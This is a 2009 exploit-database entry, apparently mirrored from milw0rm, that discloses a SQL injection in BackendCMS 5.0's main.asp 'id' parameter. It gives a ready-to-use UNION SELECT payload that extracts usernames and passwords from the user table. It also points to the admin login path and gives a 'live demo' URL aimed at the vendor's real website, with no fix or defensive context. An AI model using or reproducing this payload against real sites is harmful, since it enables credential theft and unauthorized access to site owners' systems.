[] NeoSense
E X P L O I T S
title author type platform port cve id

Back-End CMS 5.0 - 'main.asp?id' SQL Injection

Author: AnGeL25dZ
type: webapps
platform: asp
port: 
date_added: 2009-04-08 
date_updated:  
verified: 1 
codes: OSVDB-53607 
tags: 
aliases:  
screenshot_url:  
application_url: 
************************************************************
** 	BackendCMS Version 5.0 SQl Injection
************************************************************
**  Prodcut:		BackendCMS Version 5.0
**  Home   : 		http://www.backendcms.dk/
**  Vunlerability :	SQL Injection
**  Dork : 		find it yourself
**
************************************************************
** Discovred by:	AnGeL25dZ
** Contact     : 	angel25dz@gmail.com
** *********************************************************
** Greetz to :	 ALLAH
**		 All Members of HackTeach
**		 All Members of http://islam-attack.com
**		 ra3ch and all my friends ...MOC
**
*************************************************************
******************** SQL Injection **************************
*************************************************************
** Exploit:  http://[PATH]/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user
**
** Administration Login : http://[path]/admin/
** PS: the number of columns can be different from one site to another
**
****************************************************************
** Live demo : http://www.backendcms.dk/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user

# milw0rm.com [2009-04-09]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.